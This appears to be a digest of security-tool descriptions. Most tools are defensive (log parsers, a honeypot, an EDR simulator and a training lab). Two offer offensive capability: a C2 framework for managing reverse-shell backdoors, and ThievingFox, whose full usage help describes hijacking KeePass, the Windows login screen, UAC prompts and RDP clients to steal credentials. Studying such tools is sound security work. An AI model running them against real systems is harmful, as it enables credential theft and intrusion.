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MasterParser - Powerful DFIR Tool Designed For Analyzing And Parsing Linux Logs

What is MasterParser ?

MasterParser stands as a robust Digital Forensics and Incident Response tool meticulously crafted for the analysis of Linux logs within the var/log directory. Specifically designed to expedite the investigative process for security incidents on Linux systems, MasterParser adeptly scans supported logs, such as auth.log for example, extract critical details including SSH logins, user creations, event names, IP addresses and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for Incident Responders. Beyond its immediate utility for DFIR teams, MasterParser proves invaluable to the broader InfoSec and IT community, contributing significantly to the swift and comprehensive assessment of security events on Linux platforms.

MasterParser Wallpapers

Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper

Supported Logs Format

This is the list of supported log formats within the var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats for analysis. |Supported Log Formats List| | --- | | auth.log |

Feature & Log Format Requests:

If you wish to propose the addition of a new feature \ log format, kindly submit your request by creating an issue Click here to create a request

How To Use ?

How To Use - Text Guide

  1. From this GitHub repository press on "<> Code" and then press on "Download ZIP".
  2. From "MasterParser-main.zip" export the folder "MasterParser-main" to you Desktop.
  3. Open a PowerSehll terminal and navigate to the "MasterParser-main" folder.
# How to navigate to "MasterParser-main" folder from the PS terminal
PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
  1. Now you can execute the tool, for example see the tool command menu, do this:
# How to show MasterParser menu
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
  1. To run the tool, put all your /var/log/* logs in to the 01-Logs folder, and execute the tool like this:
# How to run MasterParser
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
  1. That's it, enjoy the tool!

How To Use - Video Guide


MasterParser Social Media Publications

Social Media Posts
1. First Tool Post
2. First Tool Story Publication By Help Net Security
3. Second Tool Story Publication By Forensic Focus
4. MasterParser featured in Help Net Security: 20 Essential Open-Source Cybersecurity Tools That Save You Time

C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2


C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

๐Ÿ”’ Anywhere Access: Reach the C2 Cloud from any location.
๐Ÿ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
๐Ÿ–ฑ๏ธ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
๐Ÿ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

๐Ÿ› ๏ธ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
๐Ÿ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
๐ŸŒ Nginx: Effortlessly routing traffic between web and backend systems.
๐Ÿ“จ Redis PubSub: Serving as a robust message broker for seamless communication.
๐Ÿš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
๐Ÿ’พ Postgres DB: Ensuring persistent storage for seamless continuity.


Application setup

  • Management port: 9000
  • Reversse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chait_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers Note: The c2-api service will not start up until the database is initialized. If you receive 500 errors, please try after some time.


Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.


Distributed under the MIT License. See LICENSE for more information.


OSTE-Web-Log-Analyzer - Automate The Process Of Analyzing Web Server Logs With The Python Web Log Analyzer

Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:


  1. Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.

  2. Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools.

  3. Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.

  4. User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.

Future Features

This project is actively developed, and future features may include:

  1. IP Geolocation: Identify the geographic location of IP addresses in the logs.
  2. Real-time Monitoring: Implement real-time monitoring capabilities for immediate threat detection.


The tool only requires Python 3 at the moment.

  1. step1: git clone https://github.com/OSTEsayed/OSTE-Web-Log-Analyzer.git
  2. step2: cd OSTE-Web-Log-Analyzer
  3. step3: python3 WLA-cli.py


After cloning the repository to your local machine, you can initiate the application by executing the command python3 WLA-cli.py. simple usage example : python3 WLA-cli.py -l LogSampls/access.log -t

use -h or --help for more detailed usage examples : python3 WLA-cli.py -h



ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.

The accompanying blog post can be found here



Rustup must be installed, follow the instructions available here : https://rustup.rs/

The mingw-w64 package must be installed. On Debian, this can be done using :

apt install mingw-w64

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu

Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin

After adding Mono repositories, Nuget can be installed using apt :

apt install nuget

Finally, python dependancies must be installed :

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11.


Rustup must be installed, follow the instructions available here : https://rustup.rs/

Both x86 and x86_64 windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc

.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"

Finally, python dependancies must be installed :

pip install -r client/requirements.txt

ThievingFox works with python >= 3.11

NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)


All modules have been tested on the following Windows versions :

Windows Version
Windows Server 2022
Windows Server 2019
Windows Server 2016
Windows Server 2012R2
Windows 10
Windows 11

[!CAUTION] Modules have not been tested on other version, and are expected to not work.

Application Injection Method
KeePass.exe AppDomainManager Injection
KeePassXC.exe DLL Proxying
LogonUI.exe (Windows Login Screen) COM Hijacking
consent.exe (Windows UAC Popup) COM Hijacking
mstsc.exe (Windows default RDP client) COM Hijacking
RDCMan.exe (Sysinternals' RDP client) COM Hijacking
MobaXTerm.exe (3rd party RDP client) COM Hijacking


[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

ThievingFox contains 3 main modules : poison, cleanup and collect.


For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.

To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU hive).

--keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

The KeePass modules requires the Visual C++ Redistributable to be installed on the target.

Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

[!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--ke epassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications


For each application specified in the command line parameters, the cleanup first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.

For applications that support poisonning of both HKCU and HKCR hives, both are cleaned up regardless.

Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

It does not clean extracted credentials on the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications


For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of th e domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications

Galah - An LLM-powered Web Honeypot Using The OpenAI API

TL;DR: Galah (/ษกษ™หˆlษ‘ห/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone [email protected]:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

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llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.`

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}


% curl http://localhost:8888/i-mean-are-you-a-fake-server`
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!

CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


Detection Description
Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
PE Stomping Identifies instances of PE (Portable Executable) stomping.
Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.


To get started with CrimsonEDR, follow these steps:

  1. Install dependancy: bash sudo apt-get install gcc-mingw-w64-x86-64
  2. Clone the repository: bash git clone https://github.com/Helixo32/CrimsonEDR
  3. Compile the project: bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

โš ๏ธ Warning

Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.


To use CrimsonEDR, follow these steps:

  1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
  1. Execute CrimsonEDRPanel.exe with the following arguments:

    • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

    • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

Useful Links

Here are some useful resources that helped in the development of this project:


For questions, feedback, or support, please reach out to me via:

Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0 Created BY BLACK-SCORP10 t.me/BLACK-SCORP10


  • Check the status of single or multiple URLs/domains.
  • Asynchronous HTTP requests for improved performance.
  • Color-coded output for better visualization of status codes.
  • Progress bar when checking multiple URLs.
  • Save results to an output file.
  • Error handling for inaccessible URLs and invalid responses.
  • Command-line interface for easy usage.


  1. Clone the repository:

bash git clone https://github.com/your_username/status-checker.git cd status-checker

  1. Install dependencies:

bash pip install -r requirements.txt


python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
  • -d, --domain: Single domain/URL to check.
  • -l, --list: File containing a list of domains/URLs to check.
  • -o, --output: File to save the output.
  • -v, --version: Display version information.
  • -update: Update the tool.


python status_checker.py -l urls.txt -o results.txt



This project is licensed under the MIT License - see the LICENSE file for details.

CSAF - Cyber Security Awareness Framework

The Cyber Security Awareness Framework (CSAF) is a structured approach aimed at enhancing Cybersecurity" title="Cybersecurity">cybersecurity awareness and understanding among individuals, organizations, and communities. It provides guidance for the development of effective Cybersecurity" title="Cybersecurity">cybersecurity awareness programs, covering key areas such as assessing awareness needs, creating educational m aterials, conducting training and simulations, implementing communication campaigns, and measuring awareness levels. By adopting this framework, organizations can foster a robust security culture, enhance their ability to detect and respond to cyber threats, and mitigate the risks associated with attacks and security breaches.



  • Docker
  • Docker-compose



  • 4 Core CPU
  • 10GB RAM
  • 60GB Disk free


  • 8 Core CPU or above
  • 16GB RAM or above
  • 100GB Disk free or above


Clone the repository

git clone https://github.com/csalab-id/csaf.git

Navigate to the project directory

cd csaf

Pull the Docker images

docker-compose --profile=all pull

Generate wazuh ssl certificate

docker-compose -f generate-indexer-certs.yml run --rm generator

For security reason you should set env like this first

export ATTACK_PASS=ChangeMePlease
export DEFENSE_PASS=ChangeMePlease
export MONITOR_PASS=ChangeMePlease
export SPLUNK_PASS=ChangeMePlease
export GOPHISH_PASS=ChangeMePlease
export MAIL_PASS=ChangeMePlease
export PURPLEOPS_PASS=ChangeMePlease

Start all the containers

docker-compose --profile=all up -d

You can run specific profiles for running specific labs with the following profiles - all - attackdefenselab - phisinglab - breachlab - soclab

For example

docker-compose --profile=attackdefenselab up -d


Exposed Ports

An exposed port can be accessed using a proxy socks5 client, SSH client, or HTTP client. Choose one for the best experience.

  • Port 6080 (Access to attack network)
  • Port 7080 (Access to defense network)
  • Port 8080 (Access to monitor network)

Example usage

Access internal network with proxy socks5

  • curl --proxy socks5://ipaddress:6080
  • curl --proxy socks5://ipaddress:7080
  • curl --proxy socks5://ipaddress:8080

Remote ssh with ssh client

  • ssh kali@ipaddress -p 6080 (default password: attackpassword)
  • ssh kali@ipaddress -p 7080 (default password: defensepassword)
  • ssh kali@ipaddress -p 8080 (default password: monitorpassword)

Access kali linux desktop with curl / browser

  • curl http://ipaddress:6080/vnc.html
  • curl http://ipaddress:7080/vnc.html
  • curl http://ipaddress:8080/vnc.html

Domain Access

  • http://attack.lab/vnc.html (default password: attackpassword)
  • http://defense.lab/vnc.html (default password: defensepassword)
  • http://monitor.lab/vnc.html (default password: monitorpassword)
  • https://gophish.lab:3333/ (default username: admin, default password: gophishpassword)
  • https://server.lab/ (default username: [email protected], default passowrd: mailpassword)
  • https://server.lab/iredadmin/ (default username: [email protected], default passowrd: mailpassword)
  • https://mail.server.lab/ (default username: [email protected], default passowrd: mailpassword)
  • https://mail.server.lab/iredadmin/ (default username: [email protected], default passowrd: mailpassword)
  • http://phising.lab/
  • http://gitea.lab/ (default username: csalab, default password: giteapassword)
  • http://dvwa.lab/ (default username: admin, default passowrd: password)
  • http://dvwa-monitor.lab/ (default username: admin, default passowrd: password)
  • http://dvwa-modsecurity.lab/ (default username: admin, default passowrd: password)
  • http://wackopicko.lab/
  • http://juiceshop.lab/
  • https://wazuh-indexer.lab:9200/ (default username: admin, default passowrd: SecretPassword)
  • https://wazuh-manager.lab/
  • https://wazuh-dashboard.lab:5601/ (default username: admin, default passowrd: SecretPassword)
  • http://splunk.lab/ (default username: admin, default password: splunkpassword)
  • https://infectionmonkey.lab:5000/
  • http://purpleops.lab/ (default username: [email protected], default password: purpleopspassword)
  • http://caldera.lab/ (default username: red/blue, default password: calderapassword)

Network / IP Address


  • attack.lab
  • phising.lab
  • server.lab
  • mail.server.lab
  • gophish.lab
  • infectionmonkey.lab
  • mongodb.lab
  • purpleops.lab
  • caldera.lab


  • defense.lab
  • dvwa.lab
  • wackopicko.lab
  • juiceshop.lab
  • gitea.lab
  • infectionmonkey.lab
  • purpleops.lab
  • caldera.lab


  • server.lab
  • mail.server.lab
  • mariadb.lab
  • dvwa.lab
  • dvwa-monitor.lab
  • dvwa-modsecurity.lab
  • monitor.lab
  • wazuh-manager.lab
  • wazuh-indexer.lab
  • wazuh-dashboard.lab
  • splunk.lab


  • defense.lab
  • wackopicko.lab


  • monitor.lab
  • wazuh-manager.lab
  • wazuh-dashboard.lab
  • splunk.lab


  • attack.lab
  • dvwa-modsecurity.lab
  • wackopicko.lab


This Docker Compose application is released under the MIT License. See the LICENSE file for details.

